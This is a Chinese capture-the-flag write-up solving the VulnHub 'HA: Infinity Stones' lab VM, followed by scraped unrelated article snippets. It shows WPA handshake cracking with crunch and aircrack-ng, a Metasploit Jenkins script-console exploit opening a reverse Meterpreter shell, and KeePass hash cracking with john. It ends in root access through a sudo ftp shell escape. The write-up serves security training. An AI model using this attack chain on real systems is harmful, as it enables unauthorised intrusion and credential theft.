HA: Infinity Stones-Write-up
- 主题还是关于复仇者联盟的,这次是无限宝石的。
信息收集
- 虚拟机的IP为:192.168.116.137
➜ ~ nmap -sn 192.168.116.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 19:53 CST
Nmap scan report for 192.168.116.1
Host is up (0.0019s latency).
Nmap scan report for 192.168.116.137
Host is up (0.00076s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.55 seconds
➜ ~ nmap -A -T4 192.168.116.137 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 20:09 CST
Nmap scan report for 192.168.116.137
Host is up (0.0091s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
| 256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_ 256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after: 2020-09-14T17:18:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
➜ ~
- SHH和3个Web服务:
- 80端口:主页显示的是六颗宝石的图片,还有一个答题的页面。
- 443端口:Nmap输出的证书一看就不正常,这么长。
- 第一颗宝石到手,
MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}。 - 8080端口:跳转到了Jenkins的登录页面。
- 先扫80端口的目录
➜ ~ dirb http://192.168.116.137
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Sep 23 20:32:09 2019
URL_BASE: http://192.168.116.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.116.137/ ----
==> DIRECTORY: http://192.168.116.137/images/
==> DIRECTORY: http://192.168.116.137/img/
+ http://192.168.116.137/index.html (CODE:200|SIZE:3261)
+ http://192.168.116.137/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.116.137/wifi/
---- Entering directory: http://192.168.116.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.137/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.116.137/wifi/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Sep 23 20:32:12 2019
DOWNLOADED: 4612 - FOUND: 2
➜ ~
- 发现有三个目录
http://192.168.116.137/wifi/
http://192.168.116.137/img/
http://192.168.116.137/images/
破解WiFi密码
- 在wifi这个目录下,有一个pwn.txt,里面好像是密码的规则;还有一个数据包,前面的密码应该是用来解这个数据包的。
➜ ~ curl "http://192.168.116.137/wifi/pwd.txt"
Your Password is thanos daughter name "gam" (note it's all lower case) plus the following
I enforced new password requirement on you ... 12 characters
One uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre
➜ ~
- 密码提示为以gam都是小写开头,再加上一个大写字母,两个数字,两个小写字母,复仇者联盟第一次上映的年份。就像:gamA12bc2012,一共是12位密码。
- crunch走起:
% 代表数字
^ 代表特殊符号
@ 代表小写字母
, 代表大写字符
---
➜ VulnHub crunch 12 12 -t gam,%%@@2012 -o dict.txt
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600
crunch: 100% completed generating output
➜ VulnHub
- 破解WiFi密码,kali入门操作。
➜ VulnHub aircrack-ng reality.cap -w dict.txt
Opening reality.capease wait...
Read 4848 packets.
# BSSID ESSID Encryption
1 38:D5:47:42:EE:A0 Kavish_2.4Ghz WPA (1 handshake)
Choosing first network as target.
Opening reality.capease wait...
Read 4848 packets.
1 potential targets
Aircrack-ng 1.5.2
[00:00:56] 128345/1757592 keys tested (2277.47 k/s)
Time left: 11 minutes, 55 seconds 7.30%
KEY FOUND! [ gamA00fe2012 ]
Master Key : 90 EC 8F B0 CC E3 C5 0E EE AC AD 05 0B A9 08 47
FD 4D 3E 55 60 7D B3 B0 92 21 FB 06 BA 96 53 90
Transient Key : 66 85 68 5E A3 0C BD 5E 6E 3D ED 66 DC 07 76 9F
08 5B CD E3 58 56 D6 AB 18 5C CC 75 7C 1D A3 E7
87 BE 75 0F 24 EA 12 AC C5 EE 56 34 4C B5 3A 40
73 77 F2 F3 D0 C7 DC E5 ED 5A A0 83 87 37 94 31
EAPOL HMAC : AB 9A 17 CA 09 25 69 2B 71 06 76 EA F8 FE 23 67
➜ VulnHub
- 密码为:gamA00fe2012,然后可以用WireShark把数据包里的内容看一下。一开始还以为Flag在数据包了,因为以前有遇到这种情况。既然写到了这里就顺便写一下怎么解加密的WiFi的pcap包,所以大家不要去连接一些陌生的WiFi热点。
➜ VulnHub airdecap-ng -e Kavish_2.4Ghz -p gamA00fe2012 reality.cap
Total number of stations seen 5
Total number of packets read 4848
Total number of WEP data packets 0
Total number of WPA data packets 245
Number of plaintext data packets 0
Number of decrypted WEP packets 0
Number of corrupted WEP packets 0
Number of decrypted WPA packets 136
Number of bad TKIP (WPA) packets 0
Number of bad CCMP (WPA) packets 0
- 解完默认在目录下生成一个
reality-dec.cap文件,直接用WireShark打开就可以看到里面的数据了,开不开心,惊不惊讶,一般人我不告诉他。 - 或者用WireShark在首选项里的协议里IEEE802.11加上WiFi的密码。
- 但搞了这么久,发现Flag并不是在数据包了,真是日了狗了。其实在密码作为URL的路径,里面有一个文件存着Flag。
➜ VulnHub curl "http://192.168.116.137/gamA00fe2012/realitystone.txt"
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
➜ VulnHub
- 第二课宝石拿到手:
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
小考试
- 第二条线索,
Computers tells us Binary is the path to Reality.,答题页面的提示。就是一个小考试,对的为1,错的为0,一共8道题,8位数字作为URL的路径。这里直接爆破好了,反正也不会英语。
➜ VulnHub dirb http://192.168.116.137 01.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Sep 24 00:16:29 2019
URL_BASE: http://192.168.116.137/
WORDLIST_FILES: 01.txt
-----------------
GENERATED WORDS: 256
---- Scanning URL: http://192.168.116.137/ ----
==> DIRECTORY: http://192.168.116.137/01101001/
---- Entering directory: http://192.168.116.137/01101001/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Sep 24 00:16:29 2019
DOWNLOADED: 256 - FOUND: 0
➜ VulnHub
➜ VulnHub curl "http://192.168.116.137/01101001/hints.txt"
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<
➜ VulnHub
- 上面的奇怪的字符简称BF,全称不好写在博客。在线解解密得
admin:avengers,像基本认证的账号和密码,先放一边。
Exif信息
- 上面扫到的img目录,只有一张图片,exiftool读exif信息发现了Flag。
➜ VulnHub wget http://192.168.116.137/img/space.jpg
--2019-09-24 00:22:01-- http://192.168.116.137/img/space.jpg
正在连接 192.168.116.137:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:17002 (17K) [image/jpeg]
正在保存至: “space.jpg”
space.jpg 100%[==========================================================================================================================================>] 16.60K --.-KB/s 用时 0s
2019-09-24 00:22:01 (98.5 MB/s) - 已保存 “space.jpg” [17002/17002])
➜ VulnHub exiftool space.jpg
ExifTool Version Number : 11.50
File Name : space.jpg
Directory : .
File Size : 17 kB
File Modification Date/Time : 2019:09:13 13:35:30+08:00
File Access Date/Time : 2019:09:24 00:22:01+08:00
File Inode Change Date/Time : 2019:09:24 00:22:01+08:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
Image Width : 768
Image Height : 432
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 768x432
Megapixels : 0.332
➜ VulnHub
- 第三颗宝石到手:
SPACESTONE:{74E57403424607145B9B77809DEB49D0}。
Jenkins
- 上面找到了一组账号密码
admin:avengers,尝试登录http://192.168.116.137:8080/login?from=%2F,一个Jenkins管理后台,密码正确,先丢链接https://github.com/gquere/pwn_jenkins。刚好8天前出了一个git client的RCE,还想试试来着,打开插件管理看到版本是2.8.6,git plugin存在漏洞的在<3.12.0版本内,但是安装版本为3.12.1,MSF里有利用脚本,真香。
msf5 exploit(multi/http/jenkins_script_console) > show options
Module options (exploit/multi/http/jenkins_script_console):
Name Current Setting Required Description
---- --------------- -------- -----------
API_TOKEN no The API token for the specified username
PASSWORD avengers no The password for the specified username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.116.137 yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path to the Jenkins-CI application
URIPATH no The URI to use for this exploit (default is random)
USERNAME admin no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
1 Linux
msf5 exploit(multi/http/jenkins_script_console) > run
[*] Started reverse TCP handler on 192.168.116.1:4444
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: '8c428c023cf3d9b8ad5a0b5ec036aff8' (Jenkins-Crumb style)
[*] 192.168.116.137:8080 - Sending Linux stager...
[*] Sending stage (985320 bytes) to 192.168.116.137
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.137:36498) at 2019-09-24 15:30:27 +0800
meterpreter >
- 转交互式终端:
python3 -c 'import pty;pty.spawn("/bin/bash")',环境变量了没有python的路径,但有3的。
python3 -c 'import pty;pty.spawn("/bin/bash")'
jenkins@ubuntu:/home/morag$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/opt/script
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/arping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/core18/1144/bin/mount
/snap/core18/1144/bin/ping
/snap/core18/1144/bin/su
/snap/core18/1144/bin/umount
/snap/core18/1144/usr/bin/chfn
/snap/core18/1144/usr/bin/chsh
/snap/core18/1144/usr/bin/gpasswd
/snap/core18/1144/usr/bin/newgrp
/snap/core18/1144/usr/bin/passwd
/snap/core18/1144/usr/bin/sudo
/snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1144/usr/lib/openssh/ssh-keysign
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
jenkins@ubuntu:/home/morag$
- 找到
/opt/script,执行
jenkins@ubuntu:/home/morag$ cd /opt
cd /opt
jenkins@ubuntu:/opt$ ls
ls
morag.kdbx script
jenkins@ubuntu:/opt$ ./script
./script
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$
- 第四颗宝石:
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}j
KeePass破解
- 还发现一个
kdbx后缀的文件morag是一个用户名。
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$ file morag.kdbx
file morag.kdbx
morag.kdbx: Keepass password database 2.x KDBX
jenkins@ubuntu:/opt$
- Keepass password database 2.x KDBX,下载回来keepass2john转Hash再用John破解。
➜ VulnHub keepass2john morag.kdbx
morag:$keepass$*2*60000*0*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0
➜ VulnHub keepass2john morag.kdbx >keepass.hash
➜ VulnHub john keepass.hash
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
princesa (morag)
1g 0:00:00:13 DONE 2/3 (2019-09-24 16:03) 0.07283g/s 209.9p/s 209.9c/s 209.9C/s pretty..fuckyou1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
➜ VulnHub john keepass.hash --show
morag:princesa
1 password hash cracked, 0 left
- 账号密码为:
morag:princesa,因为在home目录看到有morag这个用户名,所以应该可以用上。先用KeePass打开morag.kdbx文件,输入密码,可以复制密码到剪切板。An98XArsp1Ncj0hAZLda,发现密码不对但是备注了还有一段文字,盲猜base64,解码得到:morag:yondu,所以密码为yondu。Jenkins切换用户成功,也可以登录ssh服务。
jenkins@ubuntu:/opt$ su morag
su morag
Password: yondu
morag@ubuntu:/opt$ ls
morag@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for morag on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User morag may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/ftp
morag@ubuntu:~$
ftp> help
help
Commands may be abbreviated. Commands are:
! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> !/bin/bash
!/bin/bash
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~#
root@ubuntu:/root# ls
ls
final.txt
root@ubuntu:/root# cat final.txt
cat final.txt
┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬ ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐ ┬ ┬┌─┐┬ ┬ ┌─┐┌─┐┬ ┬┌┐┌┌┬┐ ┌┬┐┬ ┬┌─┐ ┌─┐┬┌┐┌┌─┐┬ ┌─┐┬ ┌─┐┌─┐ ┬┬
││║ │ │││││ ┬├┬┘├─┤ │ │ ││ ├─┤ │ ││ ││││└─┐ └┬┘│ ││ │ ├┤ │ ││ ││││ ││ │ ├─┤├┤ ├┤ ││││├─┤│ ├┤ │ ├─┤│ ┬ ││
oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘ ┴ └─┘└─┘ └ └─┘└─┘┘└┘─┴┘ ┴ ┴ ┴└─┘ └ ┴┘└┘┴ ┴┴─┘ └ ┴─┘┴ ┴└─┘ oo
,g@@@@@@g,
@@@@NMMN@@@g,gggpg,
]@@@` "@@@@@@@@@@@@ ,,,,
]@@@ $@@@" "%@@@@@@@@@@g
]@@@ $@@@ ]@@@@M*"*%@@@g@@@@@@g
]@@@ $@@@ ]@@@L ]@@@@@NN@@@@g
]@@@ $@@@ ]@@@` ]@@@' ]@@@L
]@@@ggg $@@@ ]@@@` ]@@@ $@@P
]@@@@@@L $@@@@@@ ]@@@L ]@@@ $@@P
]@@@@@ 1 "%@@@@F '%@@@@@W $@@@,,, $@@P
]@@@@@, $@@@L 2 ]@@@M '%@@@@@ ]@@@@,
,,,,]@@@@@@@g@@@@@@@, ,@@@@ 3 $@@@' '%@@@
,g@@@@@@@@@@"%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4 ]@@@F
g@@@M*"""%@@@ '"MMMMM'"%@@@@@@@@@@@@g,,g@@@M
j@@@F ]@@@ "****' "%@@@@@@@@P
]@@@L ]@@@ ,ggggg, ''"}$@@P
]@@@L g@@@@@@ g@@@@@@@@@g j@@@ $@@P
]@@@L %NN@@@@ $@@@C ]@@@@ ]@@@L $@@P
]@@@L '%M" j@@@F 6 ]@@@ ]@@@L $@@P
]@@@L '@@@@ $@@@ ]@@@L $@@P
]@@@gg@@@@w ]@@@@ggg@@@@L ]@@@L]@@@L
%@@@@@@NM" '%@@@@@@@M` ;@@@M j@@@L
]@@@@ ,@@g ''` #@@@M )@@@M
]@@@L 5 $@@@ `**`,@@@@F
]@@@Wggg@@@@F ,g@@@@@`
"%@@@@@@@@@@@@@@@g ,@@@@@@@@@
'""*%N@@@@@@@M *MF" '$@@@
@@@@ gg, j@@@,
$@@@` j@@@L %@@@
.@@@@ %@@@ ]@@@
SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
-----------Contact Undersigned to share your feedback with HACKING ARTICLES Teams-------------
AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/
Kavish Tyagi: Tyagi_kavish_ Twitter
- 第五颗宝石到手:
SOULSTONE:{56F06B4DAC14CE346998483989ABFF16} - 还有一颗在KeePass的Flag标签里
POWERSTONE:{EDDF140F156862C9B494C0B767DCD412} - 六颗都集完了,打个响指吧。
HA: Infinity Stones-Write-up的更多相关文章
- HA: Infinity Stones Vulnhub Walkthrough
下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...
- openstack实现nova-api的HA
1 实验环境 Openstack juno版本,一个controller(计算节点也在这个物理节点上)和一个网络节点network 使用haproxy作为代理软件 使用pacemaker作 ...
- HA 高可用软件系统保养指南
又过了一年 618,六月是公司一年一度的大促月,一般提前一个月各系统就会减少需求和功能的开发,转而更多去关注系统可用性.稳定性和管控性等方面的非功能需求.大促前的准备工作一般叫作「备战」,可以把线上运 ...
- MySQL: Fabric 搭建 HA
搭建好Fabric之后,就可以在它的基础上创建HA Group. Shard Group.HA+Shard Group等.这里来说明一下如何快速的搭建HA环境. Fabric 192.168.2.23 ...
- zookeeper集群的搭建以及hadoop ha的相关配置
1.环境 centos7 hadoop2.6.5 zookeeper3.4.9 jdk1.8 master作为active主机,data1作为standby备用机,三台机器均作为数据节点,yarn资源 ...
- 使用Nginx+Lua代理Hadoop HA
一.Hadoop HA的Web页面访问 Hadoop开启HA后,会同时存在两个Master组件提供服务,其中正在使用的组件称为Active,另一个作为备份称为Standby,例如HDFS的NameNo ...
- hadoop2.7.1 HA安装部署(转)
hadoop集群规划 目标:创建2个NameNode,做高可用,一个NameNode挂掉,另一个能够启动:一个运行Yarn,3台DataNode,3台Zookeeper集群,做高可用. 在 hadoo ...
- 【转】 XenServer架构之HA概述
一.XenServer HA概述 XenServer HA是一套全自动功能设计,规划,安全地恢复出现问题的XenServe 主机上的虚拟机的功能组件. 启用 HA 后,XenServer 将持续监视池 ...
- ActiveMQ笔记(3):基于Networks of Brokers的HA方案
上一篇介绍了基于ZK的ActiveMQ HA方案,虽然理解起来比较容易,但是有二个不足: 1) 占用的节点数过多,1个zk集群至少3个节点,1个activemq集群也至少得3个节点,但其实正常运行时 ...
随机推荐
- SqlDataAdapter、DataSet、DataTable使用
原文链接:https://blog.csdn.net/zhang_hui_cs/article/details/7327395 using System.Data; using System.Data ...
- 吴裕雄 python 机器学习——数据预处理标准化MaxAbsScaler模型
from sklearn.preprocessing import MaxAbsScaler #数据预处理标准化MaxAbsScaler模型 def test_MaxAbsScaler(): X=[[ ...
- Codeforces 1315B Homecoming (二分)
After a long party Petya decided to return home, but he turned out to be at the opposite end of the ...
- Java 常见异常及处理方案
Java 常见异常处理方案 异常是程序中的一些错误,但并不是所有的错误都是异常,并且错误有时候是可以避免的. 比如说,你的代码少了一个分号,那么运行出来结果是提示是错误java.lang.Error: ...
- 解决VMware Workstation下Win2012R2无法安装Hyper-v问题
有时候我们需要测试Hyper-V但是发现VMware下不能够正常安装,提示:验证过程发现你要安装功能的服务器存在问题.所选功能与所选服务器的当前配置不兼容.无法安装Hyper-V:虚拟机监控程序已在运 ...
- aria2连接网站出现handshake failure问题的分析与解决方法
aria2是一款轻量级的,支持多协议,跨平台的命令行下载工具,是笔者目前在使用的下载工具,结合uget使用基本上能媲美window下的迅雷工具.在笔者使用过程中,遇到了aria2连接部分网站时出现ha ...
- robot用例执行常用命令
执行命令 执行一个用例 robot -t “testcase_name“ data_test.robot 按用例文件执行 robot data_test.robot或者 robot --suite “ ...
- buuctf——easyjava
虽然学过Javaweb的开发,但没好好学,所以对Javaweb了解不深 菜的真实 WEB-INF/web.xml泄露 贴一个别人的源码泄露总结ctf/web源码泄露及利用办法[总结中] WEB-INF ...
- 《FA分享》---创业学习--训练营直播第二课--HHR
盛沛涵,以太白泽董事 一,基金投资的出发点: 1,这个赛道是否只有头部一两名有机会,如果不是,投的概率更大. 2, 基金投资的判断逻辑: 1.我是不是要在这个赛道布局 2.这个赛道分布如何,有 ...
- 矩阵matrix
矩阵matrix 1. 矩阵matrix 1.1. 定义由 m × n 个数aij排成的m行n列的数表称为m行n列的矩阵,简称m × n矩阵.记作: 这m×n 个数称为矩阵A的元素,简称为元,数aij ...